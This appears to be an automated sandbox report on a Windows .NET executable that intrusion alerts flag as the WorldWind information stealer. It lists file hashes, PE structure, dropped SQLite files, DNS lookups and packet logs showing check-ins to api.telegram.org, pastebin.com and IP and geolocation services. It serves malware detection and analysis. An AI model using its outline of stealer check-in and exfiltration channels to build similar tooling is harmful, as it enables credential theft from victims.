                                                            Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD713.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):98304
                                                            Entropy (8bit):0.08235737944063153
                                                            Encrypted:false
                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpD724.tmp.dat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):5242880
                                                            Entropy (8bit):0.03799545499236577
                                                            Encrypted:false
                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZru/bNb/fc3DDTnHI:58r54w0VW3xWZrwbFHc3T
                                                            MD5:96AB9233CA2AB3982F98B1BA44CFFE32
                                                            SHA1:A72C6AF1881274392B7D73594D78C4D3F1B91428
                                                            SHA-256:C764FE5DA2665335A3C2E60091F08E21A16CEC35EFD453AE092FEB1D7C3D69BC
                                                            SHA-512:E09E96834C049E56FE5E9A56BA1635CA6A4FB5DF2F2EB8F339C94D4BCF2D24150592B2833D084BD4BD7D0319B4D5C493B5B49A64310E084684375D645DD8CEEC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):5.896903575826479
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:vYz1Z2heor.exe
                                                            File size:179'200 bytes
                                                            MD5:7f1630df6b57af024a3b561bdadc208f
                                                            SHA1:9b304cb2eff05f040b76eccc00ee55b914cf1839
                                                            SHA256:c9dbac4fe659e8918f50a4a157713e40d71e05367799af66d1d7845d958ee3f7
                                                            SHA512:742219cb5c76b9d39ed56cff988a533d19ef3e202e0fa48e9a3aed7dd9de190eef0c313bc974e37e7f363892eb6787bc66657324be2f0fb05d1b0021ae61ec9e
                                                            SSDEEP:3072:Je8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gT1wARE+WpCc:F6ewwIwQJ6vKX0c5MlYZ0b2K
                                                            TLSH:C8045B5837D80A15F3BE5FB8F4B012118B75B477AA1AE75F08E920EE0D62351E911FA3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............`................................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x42d1be
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x66C19902 [Sun Aug 18 06:47:30 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2d16c0x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x600.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x300000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x2b1c40x2b200b02323ff1bfcfb9ff5c4069b0b1f3c42False0.4603713768115942data5.924394028212997IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x2e0000x6000x600ccd2ec796af2f339686e45e5513c2cafFalse0.4140625data4.029504312109572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x300000xc0x2008e19c1ec6db51c8435749ecf42a022c8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x2e0a00x30cdata0.4269230769230769
                                                            RT_MANIFEST0x2e3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                            2024-08-20T11:06:31.130632+0200TCP2044766ET MALWARE WorldWind Stealer Checkin via Telegram (GET)149703443192.168.2.10149.154.167.220
                                                            2024-08-20T11:06:32.063374+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349704443192.168.2.10149.154.167.220

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Aug 20, 2024 11:06:28.099852085 CEST4970180192.168.2.10104.16.185.241
                                                            Aug 20, 2024 11:06:28.104830980 CEST8049701104.16.185.241192.168.2.10
                                                            Aug 20, 2024 11:06:28.104950905 CEST4970180192.168.2.10104.16.185.241
                                                            Aug 20, 2024 11:06:28.105961084 CEST4970180192.168.2.10104.16.185.241
                                                            Aug 20, 2024 11:06:28.110806942 CEST8049701104.16.185.241192.168.2.10
                                                            Aug 20, 2024 11:06:28.578788042 CEST8049701104.16.185.241192.168.2.10
                                                            Aug 20, 2024 11:06:28.626013041 CEST4970180192.168.2.10104.16.185.241
                                                            Aug 20, 2024 11:06:28.673122883 CEST49702443192.168.2.10172.67.196.114
                                                            Aug 20, 2024 11:06:28.673175097 CEST44349702172.67.196.114192.168.2.10
                                                            Aug 20, 2024 11:06:28.673235893 CEST49702443192.168.2.10172.67.196.114
                                                            Aug 20, 2024 11:06:28.680500984 CEST49702443192.168.2.10172.67.196.114
                                                            Aug 20, 2024 11:06:28.680515051 CEST44349702172.67.196.114192.168.2.10
                                                            Aug 20, 2024 11:06:29.154309988 CEST44349702172.67.196.114192.168.2.10
                                                            Aug 20, 2024 11:06:29.154390097 CEST49702443192.168.2.10172.67.196.114
                                                            Aug 20, 2024 11:06:29.159112930 CEST49702443192.168.2.10172.67.196.114
                                                            Aug 20, 2024 11:06:29.159125090 CEST44349702172.67.196.114192.168.2.10
                                                            Aug 20, 2024 11:06:29.159388065 CEST44349702172.67.196.114192.168.2.10
                                                            Aug 20, 2024 11:06:29.203398943 CEST49702443192.168.2.10172.67.196.114
                                                            Aug 20, 2024 11:06:29.244505882 CEST44349702172.67.196.114192.168.2.10
                                                            Aug 20, 2024 11:06:30.316730022 CEST44349702172.67.196.114192.168.2.10
                                                            Aug 20, 2024 11:06:30.316783905 CEST44349702172.67.196.114192.168.2.10
                                                            Aug 20, 2024 11:06:30.316840887 CEST49702443192.168.2.10172.67.196.114
                                                            Aug 20, 2024 11:06:30.318984985 CEST49702443192.168.2.10172.67.196.114
                                                            Aug 20, 2024 11:06:30.322114944 CEST4970180192.168.2.10104.16.185.241
                                                            Aug 20, 2024 11:06:30.327460051 CEST8049701104.16.185.241192.168.2.10
                                                            Aug 20, 2024 11:06:30.327549934 CEST4970180192.168.2.10104.16.185.241
                                                            Aug 20, 2024 11:06:30.330678940 CEST49703443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:30.330718994 CEST44349703149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:30.330907106 CEST49703443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:30.331521034 CEST49703443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:30.331536055 CEST44349703149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:30.952286959 CEST44349703149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:30.952394962 CEST49703443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:30.955701113 CEST49703443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:30.955714941 CEST44349703149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:30.955981970 CEST44349703149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:30.957456112 CEST49703443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:30.957485914 CEST44349703149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:31.130688906 CEST44349703149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:31.130759954 CEST44349703149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:31.130831003 CEST49703443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:31.133168936 CEST49703443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:31.140183926 CEST49704443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:31.140214920 CEST44349704149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:31.140367985 CEST49704443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:31.140721083 CEST49704443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:31.140733004 CEST44349704149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:31.778604031 CEST44349704149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:31.780967951 CEST49704443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:31.780994892 CEST44349704149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:32.063421011 CEST44349704149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:32.063489914 CEST44349704149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:32.063606024 CEST49704443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:32.064760923 CEST49704443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:32.220347881 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:32.220388889 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:32.220475912 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:32.225459099 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:32.225476980 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:32.842881918 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:32.847392082 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:32.847409964 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.146203041 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.149372101 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.149384975 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.150443077 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.150449038 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.150597095 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.150615931 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.150712967 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.150732994 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.150799990 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.150813103 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.150887966 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.150899887 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.150949955 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.150962114 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.150999069 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.151010990 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.151052952 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.151065111 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.151129961 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.151138067 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.151334047 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.151340008 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.643863916 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.644038916 CEST44349706149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:33.644112110 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.644694090 CEST49706443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:33.653753042 CEST49709443192.168.2.10172.67.19.24
                                                            Aug 20, 2024 11:06:33.653776884 CEST44349709172.67.19.24192.168.2.10
                                                            Aug 20, 2024 11:06:33.653879881 CEST49709443192.168.2.10172.67.19.24
                                                            Aug 20, 2024 11:06:33.654181004 CEST49709443192.168.2.10172.67.19.24
                                                            Aug 20, 2024 11:06:33.654196024 CEST44349709172.67.19.24192.168.2.10
                                                            Aug 20, 2024 11:06:34.118549109 CEST44349709172.67.19.24192.168.2.10
                                                            Aug 20, 2024 11:06:34.118633986 CEST49709443192.168.2.10172.67.19.24
                                                            Aug 20, 2024 11:06:34.121387959 CEST49709443192.168.2.10172.67.19.24
                                                            Aug 20, 2024 11:06:34.121395111 CEST44349709172.67.19.24192.168.2.10
                                                            Aug 20, 2024 11:06:34.121726990 CEST44349709172.67.19.24192.168.2.10
                                                            Aug 20, 2024 11:06:34.123985052 CEST49709443192.168.2.10172.67.19.24
                                                            Aug 20, 2024 11:06:34.164524078 CEST44349709172.67.19.24192.168.2.10
                                                            Aug 20, 2024 11:06:34.474342108 CEST44349709172.67.19.24192.168.2.10
                                                            Aug 20, 2024 11:06:34.474457979 CEST44349709172.67.19.24192.168.2.10
                                                            Aug 20, 2024 11:06:34.474631071 CEST49709443192.168.2.10172.67.19.24
                                                            Aug 20, 2024 11:06:34.482639074 CEST49709443192.168.2.10172.67.19.24
                                                            Aug 20, 2024 11:06:34.486862898 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:34.486906052 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:34.487051010 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:34.487523079 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:34.487538099 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.107831955 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.118026018 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.118042946 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.486301899 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.486320019 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.486470938 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.486476898 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.486576080 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.486588955 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.486663103 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.486680984 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.486898899 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.486911058 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.487219095 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.487231016 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.487802982 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.487816095 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.487894058 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.487911940 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.487936974 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.487947941 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.488189936 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.488197088 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.488594055 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.488598108 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.566757917 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.610407114 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.990818977 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.991014004 CEST44349711149.154.167.220192.168.2.10
                                                            Aug 20, 2024 11:06:35.991080999 CEST49711443192.168.2.10149.154.167.220
                                                            Aug 20, 2024 11:06:35.992223024 CEST49711443192.168.2.10149.154.167.220

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Aug 20, 2024 11:06:28.003226042 CEST5011353192.168.2.101.1.1.1
                                                            Aug 20, 2024 11:06:28.011230946 CEST53501131.1.1.1192.168.2.10
                                                            Aug 20, 2024 11:06:28.086357117 CEST5417053192.168.2.101.1.1.1
                                                            Aug 20, 2024 11:06:28.093786001 CEST53541701.1.1.1192.168.2.10
                                                            Aug 20, 2024 11:06:28.645570993 CEST5214453192.168.2.101.1.1.1
                                                            Aug 20, 2024 11:06:28.672208071 CEST53521441.1.1.1192.168.2.10
                                                            Aug 20, 2024 11:06:30.322773933 CEST5325653192.168.2.101.1.1.1
                                                            Aug 20, 2024 11:06:30.329598904 CEST53532561.1.1.1192.168.2.10
                                                            Aug 20, 2024 11:06:33.645694971 CEST5514253192.168.2.101.1.1.1
                                                            Aug 20, 2024 11:06:33.652981043 CEST53551421.1.1.1192.168.2.10
                                                            Aug 20, 2024 11:06:46.986346006 CEST5975953192.168.2.101.1.1.1
                                                            Aug 20, 2024 11:06:47.229549885 CEST53597591.1.1.1192.168.2.10

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Aug 20, 2024 11:06:28.003226042 CEST192.168.2.101.1.1.10xb768Standard query (0)157.184.7.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            Aug 20, 2024 11:06:28.086357117 CEST192.168.2.101.1.1.10xa015Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:28.645570993 CEST192.168.2.101.1.1.10x5f57Standard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:30.322773933 CEST192.168.2.101.1.1.10x75f9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:33.645694971 CEST192.168.2.101.1.1.10x3d4fStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:46.986346006 CEST192.168.2.101.1.1.10xd493Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Aug 20, 2024 11:06:28.011230946 CEST1.1.1.1192.168.2.100xb768Name error (3)157.184.7.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                            Aug 20, 2024 11:06:28.093786001 CEST1.1.1.1192.168.2.100xa015No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:28.093786001 CEST1.1.1.1192.168.2.100xa015No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:28.672208071 CEST1.1.1.1192.168.2.100x5f57No error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:28.672208071 CEST1.1.1.1192.168.2.100x5f57No error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:30.329598904 CEST1.1.1.1192.168.2.100x75f9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:33.652981043 CEST1.1.1.1192.168.2.100x3d4fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:33.652981043 CEST1.1.1.1192.168.2.100x3d4fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:33.652981043 CEST1.1.1.1192.168.2.100x3d4fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:47.229549885 CEST1.1.1.1192.168.2.100xd493No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:47.229549885 CEST1.1.1.1192.168.2.100xd493No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            Aug 20, 2024 11:06:47.229549885 CEST1.1.1.1192.168.2.100xd493No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • api.mylnikov.org
                                                            • api.telegram.org
                                                            • pastebin.com
                                                            • icanhazip.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1049701104.16.185.241808020C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 20, 2024 11:06:28.105961084 CEST63OUTGET / HTTP/1.1
                                                            Host: icanhazip.com
                                                            Connection: Keep-Alive
                                                            Aug 20, 2024 11:06:28.578788042 CEST534INHTTP/1.1 200 OK
                                                            Date: Tue, 20 Aug 2024 09:06:28 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 12
                                                            Connection: keep-alive
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET
                                                            Set-Cookie: __cf_bm=gECSoH4acM6O38AkPgYxXstMkzyZ_d7nmLbfrdV.uQ4-1724144788-1.0.1.1-Ll0aZFW4hlLQzXtYT.Vk97iD0oL0oAR02DCbhYPEgWTgbkMkMfM6N94aDa96A_PWCytuiy4d8yuW.PfFr6.Sjw; path=/; expires=Tue, 20-Aug-24 09:36:28 GMT; domain=.icanhazip.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 8b613a4039974319-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                            Data Ascii: 8.46.123.33


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1049702172.67.196.1144438020C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            TimestampBytes transferredDirectionData
